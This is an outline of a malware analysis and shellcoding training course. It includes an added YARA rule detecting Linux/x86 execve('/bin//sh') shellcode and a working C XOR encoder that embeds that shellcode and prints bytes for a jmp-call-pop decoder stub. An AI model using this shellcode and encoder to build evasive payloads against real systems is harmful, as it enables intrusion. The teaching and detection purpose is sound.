
Acquire general knowledge of how malware works / Discover a static and dynamic analysis methodology / Create encoded payloads
Day 1 morning
❏ Section 1 – State of the art
❏ Introduction
❏ History
❏ Vectors of infection
❏ Compromise
❏ Business impacts
❏ Conventional defences
Day 1 afternoon
❏ Section 2 – System basics
❏ Boot sequence
❏ Dissection of a process
❏ Dissection of an executable
❏ Memory management
❏ Common techniques
Obfuscation, packers, encoders (evasion)
❏ Section 2 – Environment
❏ Infrastructure
❏ Good practices and creation of a lab
Day 2 morning
❏ Section 3 – Analysis tools
❏ Presentation of the analysis tools
❏ Tutorial 1 / Discovery of the Sysinternals suite (Procmon, Procexp)
❏ Static analysis
❏ Dynamic analysis
❏ Introduction to the Mandiant FLARE suite
❏ Tutorial 2 / Analysis of a PDF
❏ Tutorial 3 / Meterpreter / Unicorn / Macro analysis
❏ Sandbox
❏ VirusTotal
❏ Cuckoo
❏ AnyRun
❏ Tutorial 4 / Analysis of a payload in a sandbox
Day 2 afternoon
❏ Practical Work 1 / Case study – Analysis of an attack and writing a report
❏ Signatures
❏ YARA
❏ Creating rules
❏ YARA implementation
❏ Exchange platforms
❏ Tutorial 5 / Writing a signature for the malware
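As an added example for the signature section (not part of the course material), a YARA rule for the Linux/x86 execve("/bin//sh") shellcode that the assembly and shellcoding days build. It carries one hex pattern for the plain bytes, one string for the path pushed onto the stack, and one wildcarded pattern for the jmp-call-pop XOR decoder stub, so that an XOR-encoded copy is still caught through its unencoded decoder. The rule name, the meta values and the 5 MB size limit are choices made for this example.

```yara
rule linux_x86_execve_binsh_shellcode
{
    meta:
        description = "Linux/x86 execve(\"/bin//sh\") shellcode, plain or behind a jmp-call-pop XOR decoder stub"
        author      = "course example (hypothetical)"
        reference   = "Day 3 / Day 4 tutorials"

    strings:
        // the 23 plain bytes: xor eax,eax / push "//sh" / push "/bin" / ... / int 0x80
        $plain   = { 31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 53 89 E1 B0 0B CD 80 }
        // the path pushed onto the stack, in case only the string survives
        $binsh   = "/bin//sh" ascii
        // jmp short / pop esi / xor ecx,ecx / mov cl,LEN / xor byte [esi],KEY /
        // inc esi / loop / jmp short / call : LEN, KEY and the jump offsets are wildcards
        $decoder = { EB ?? 5E 31 C9 B1 ?? 80 36 ?? 46 E2 FA EB ?? E8 }

    condition:
        filesize < 5MB and any of them
}
```

Run it with `yara -r rule.yar <directory>` against the lab samples; the `$decoder` pattern matches whatever key was used, because the key is an immediate byte in the stub and the stub itself is never encoded.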
Day 3 morning
❏ Section 4 – Analysis of memory dumps
❏ Acquisition
❏ Volatility
❏ Processes
❏ DLLs
❏ Registry hives
❏ Injections
❏ Connections
❏ Practical Work 2 / Analysis of memory dumps
Day 3 afternoon
❏ Section 5 – Introduction to assembly (IA-32)
❏ Introduction
❏ Registers
❏ Flags
❏ Instructions
❏ The stack
❏ Tutorial 6 / First programs
❏ Hello World (write syscall)
❏ Loops
❏ Execve (/bin/sh)
Day 4 morning
❏ Section 6 – Shellcoding
❏ Introduction to GDB
❏ Useful commands
❏ Shellcode stack method
❏ Shellcode method Jmp-Call-Pop
❏ Encoders
❏ Stagers
Day 4 afternoon
❏ Practical Work 3 / Creating an XOR encoder
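As an added example for Practical Work 3 (this is not the course's own solution), a small C program that XOR-encodes a shellcode with a single-byte key, rejects keys that would leave a NULL byte in the output (a NULL ends any strcpy-style copy of the payload), verifies the round trip, and prints the key, length and encoded bytes in the form the jmp-call-pop decoder stub shown in the comments expects. The sample input is the classic 23-byte Linux/x86 execve("/bin//sh") shellcode from the assembly tutorials; it is used only as data and is never executed. The preferred key 0xAA is an arbitrary choice.

```c
/* xor_encoder.c - single-byte XOR encoder for raw shellcode (added example). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Classic Linux/x86 execve("/bin//sh") shellcode, used here only as input data. */
static const uint8_t SHELLCODE[] = {
    0x31, 0xc0,                         /* xor  eax, eax        */
    0x50,                               /* push eax             */
    0x68, 0x2f, 0x2f, 0x73, 0x68,       /* push "//sh"          */
    0x68, 0x2f, 0x62, 0x69, 0x6e,       /* push "/bin"          */
    0x89, 0xe3,                         /* mov  ebx, esp        */
    0x50,                               /* push eax             */
    0x53,                               /* push ebx             */
    0x89, 0xe1,                         /* mov  ecx, esp        */
    0xb0, 0x0b,                         /* mov  al, 11 (execve) */
    0xcd, 0x80                          /* int  0x80            */
};
#define SHELLCODE_LEN (sizeof SHELLCODE)

/* A key is usable when it is non-zero (it becomes an immediate in the decoder)
 * and no input byte equals it: in[i] ^ key == 0 exactly when in[i] == key. */
int key_is_usable(const uint8_t *in, size_t n, uint8_t key)
{
    if (key == 0)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (in[i] == key)
            return 0;
    return 1;
}

/* Try the preferred key first, then fall back to the lowest usable key.
 * Returns -1 only if every value 1..255 occurs in the input. */
int find_key(const uint8_t *in, size_t n, uint8_t preferred)
{
    if (key_is_usable(in, n, preferred))
        return preferred;
    for (int k = 1; k < 256; k++)
        if (key_is_usable(in, n, (uint8_t)k))
            return k;
    return -1;
}

/* XOR is its own inverse, so one routine both encodes and decodes. */
void xor_buf(const uint8_t *in, uint8_t *out, size_t n, uint8_t key)
{
    for (size_t i = 0; i < n; i++)
        out[i] = in[i] ^ key;
}

/* Encode SHELLCODE with key, check for NULLs, decode again and compare.
 * Returns 1 when the encoded buffer is NULL-free and decodes to the original. */
int roundtrip_ok(uint8_t key)
{
    uint8_t enc[SHELLCODE_LEN], dec[SHELLCODE_LEN];
    xor_buf(SHELLCODE, enc, SHELLCODE_LEN, key);
    if (memchr(enc, 0, SHELLCODE_LEN) != NULL)
        return 0;
    xor_buf(enc, dec, SHELLCODE_LEN, key);
    return memcmp(dec, SHELLCODE, SHELLCODE_LEN) == 0;
}

int main(void)
{
    int key = find_key(SHELLCODE, SHELLCODE_LEN, 0xAA);  /* 0xAA: arbitrary preference */
    if (key < 0 || !roundtrip_ok((uint8_t)key)) {
        fprintf(stderr, "no usable key\n");
        return 1;
    }
    uint8_t enc[SHELLCODE_LEN];
    xor_buf(SHELLCODE, enc, SHELLCODE_LEN, (uint8_t)key);

    /* The output feeds this jmp-call-pop decoder stub (NASM, 32-bit); KEY and
     * LEN are the two equates printed below:
     *      jmp short call_decoder
     *  decoder:
     *      pop esi                 ; esi -> encoded shellcode
     *      xor ecx, ecx
     *      mov cl, LEN
     *  decode:
     *      xor byte [esi], KEY
     *      inc esi
     *      loop decode
     *      jmp short shellcode
     *  call_decoder:
     *      call decoder            ; pushes the address of 'shellcode'
     *  shellcode: db ...           ; the line printed below            */
    printf("KEY equ 0x%02x\nLEN equ %zu\nshellcode: db ", key, SHELLCODE_LEN);
    for (size_t i = 0; i < SHELLCODE_LEN; i++)
        printf("0x%02x%s", enc[i], i + 1 < SHELLCODE_LEN ? "," : "\n");
    return 0;
}
```

Build with `cc -std=c99 -o xor_encoder xor_encoder.c` and paste the printed lines into the NASM source of the decoder stub; the stub itself stays unencoded, so its own bytes must also be NULL-free, which the short backward jumps and the `call` to a lower address guarantee.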
Day 5
❏ Where to find shellcodes
❏ Encoding existing shellcodes (Metasploit)
❏ Practical Work 5 / Reverse payload